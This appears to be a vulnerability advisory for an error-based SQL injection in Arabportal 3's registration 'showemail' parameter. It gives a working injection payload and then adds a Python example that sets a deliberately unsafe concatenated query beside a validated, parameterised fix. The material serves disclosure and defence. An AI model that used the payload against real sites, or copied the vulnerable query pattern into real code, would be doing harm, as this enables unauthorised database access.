Vendor: Arabportal 3
By: ali ahmady
CVSS: 8.8 HIGH
CWE: 89 (SQL injection)
Product Name: Arabportal 3
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015
Arabportal 3 SQL injection vulnerability
The Arabportal 3 registration section is vulnerable to an error-based SQL injection attack through the POST parameter 'showemail'. An example of the attack is: 1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks.
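
An added example (not part of the original advisory or Arabportal's own code) of the mitigation above: allow-list validation of 'showemail' plus parameter binding, shown next to the string-concatenation pattern that lets the quoted payload reach the SQL parser. The members table, the 0/1 meaning of 'showemail' and the use of Python's sqlite3 as an offline stand-in for the portal's database are assumptions.

```python
import sqlite3

# Payload quoted in the advisory above, kept here as an inert test string.
ADVISORY_PAYLOAD = (
    "1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) "
    "AND 'ali-ahmady'='ali-ahmady"
)

def parse_showemail(raw):
    """Allow-list validation. Assumption: 'showemail' is a 0/1 flag."""
    if raw not in ("0", "1"):
        raise ValueError("showemail must be '0' or '1'")
    return int(raw)

def open_db():
    """In-memory stand-in database with a hypothetical members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, email TEXT, showemail)")
    return conn

def register_unsafe(conn, username, email, showemail):
    """The flaw class: request data concatenated into the SQL text."""
    sql = "INSERT INTO members VALUES ('%s', '%s', '%s')"
    conn.execute(sql % (username, email, showemail))

def register_safe(conn, username, email, showemail):
    """Hardened: validate first, then bind every value as a parameter."""
    flag = parse_showemail(showemail)
    conn.execute("INSERT INTO members VALUES (?, ?, ?)", (username, email, flag))

def demo():
    """Returns (unsafe_parsed_as_sql, safe_rejected, rows_written)."""
    conn = open_db()
    try:
        register_unsafe(conn, "u1", "u1@example.test", ADVISORY_PAYLOAD)
        unsafe_parsed_as_sql = False
    except sqlite3.Error:
        # The engine tried to resolve the payload's subquery: input became code.
        unsafe_parsed_as_sql = True
    try:
        register_safe(conn, "u2", "u2@example.test", ADVISORY_PAYLOAD)
        safe_rejected = False
    except ValueError:
        safe_rejected = True
    register_safe(conn, "u3", "u3@example.test", "1")
    rows = conn.execute("SELECT username, showemail FROM members").fetchall()
    return unsafe_parsed_as_sql, safe_rejected, rows
```

The database error raised by the unsafe path is the same signal an error-based injection relies on, so the registration handler should also return a generic failure message rather than the raw database error.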